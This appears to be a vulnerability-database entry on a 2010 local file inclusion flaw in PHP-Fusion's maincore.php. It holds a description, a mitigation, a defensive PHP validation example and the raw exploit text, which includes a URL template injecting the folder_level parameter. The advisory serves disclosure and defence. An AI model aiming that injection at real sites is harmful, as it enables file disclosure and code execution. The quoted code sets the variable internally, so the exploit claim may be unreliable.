Vendor: PHP-Fusion
By: MoDaMeR
CVSS: 7,5 (HIGH)
Local File Includes
CWE: 22
Product Name: PHP-Fusion
Affected Version From: all
Affected Version To: all
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux
2010

PHP-Fusion Local File Includes Vulnerability

The vulnerability exists due to insufficient sanitization of user-supplied input passed via the 'folder_level' parameter to the '/maincore.php' script. A remote attacker can include arbitrary local files and execute arbitrary PHP code on the vulnerable system.

Mitigation:

Input validation should be used to prevent the exploitation of this vulnerability.
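
One way to apply the input-validation mitigation to the config.php lookup quoted in the exploit data below, as an added example that is not PHP-Fusion's code: the search starts from a fixed server-side directory rather than any request value, and a relative prefix such as folder_level is accepted only if it matches a strict allow-list. The function names and the temporary directory tree are assumptions made for the demonstration.

```php
<?php
// Added example, not PHP-Fusion code; function names are hypothetical.

// Find config.php by walking up from a fixed server-side directory
// (__DIR__ in real use), checking at most $maxDirs directories.
function locate_config(string $startDir, int $maxDirs = 5): string
{
    $dir = realpath($startDir);
    if ($dir === false) {
        throw new RuntimeException("Start directory does not exist");
    }
    for ($i = 0; $i < $maxDirs; $i++) {
        $candidate = $dir . DIRECTORY_SEPARATOR . "config.php";
        if (is_file($candidate)) {
            return $candidate;
        }
        $parent = dirname($dir);
        if ($parent === $dir) { // filesystem root reached
            break;
        }
        $dir = $parent;
    }
    throw new RuntimeException("Config file not found");
}

// Allow-list check for a relative prefix: "", "../", "../../", ...
// Absolute paths, file names and deeper traversal are rejected.
function is_safe_folder_level(string $value, int $maxLevels = 4): bool
{
    return preg_match('#\A(?:\.\./){0,' . $maxLevels . '}\z#', $value) === 1;
}

// Constructed demo: a temporary tree standing in for an install directory.
$root = sys_get_temp_dir() . "/fusion_demo_" . bin2hex(random_bytes(4));
mkdir($root . "/administration/sub", 0700, true);
file_put_contents($root . "/config.php", "<?php // constructed sample\n");

echo locate_config($root . "/administration/sub"), PHP_EOL;
foreach (["", "../", "../../", "/absolute/path/", "../../../../../", "../name.txt"] as $v) {
    printf("%-20s %s\n", var_export($v, true), is_safe_folder_level($v) ? "accepted" : "rejected");
}

// Remove the constructed tree.
unlink($root . "/config.php");
rmdir($root . "/administration/sub");
rmdir($root . "/administration");
rmdir($root);
```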

Exploit-DB raw data:

# Exploit Title:   PHP-Fusion Local File Includes Vulnerability
# Date: 2010/08/15
# Author: MoDaMeR
# Email: k@live.ma
# My Sites : www.v4-team.com & www.hackteach.org
# Script home: http://www.phpfusion-ar.com
# download Script:
http://www.phpfusion-ar.com/downloads.php?cat_id=1&download_id=91
# Version:all
# Tested on: Linux
# Team hacker:Mr.Mo0oM & Dr.xp
                          Palestine, we would all sacrifice ourselves for you
                         :::::::::::::::::::::::::
=================Exploit=================
maincore.php
[php]
 // Locate config.php and set the basedir path
$folder_level = ""; $i = 0;
while (!file_exists($folder_level."config.php")) {
    $folder_level .= "../"; $i++;
    if ($i == 5) { die("Config file not found"); }
}
require_once $folder_level."config.php";
define("BASEDIR", $folder_level);
[/php]
----exploit----

http://{localhost}/{path}/maincore.php?folder_level=LFI

---------greatz----------
Greatz to :
aB0 m0h4mM3d , and all v4-team & hackteach members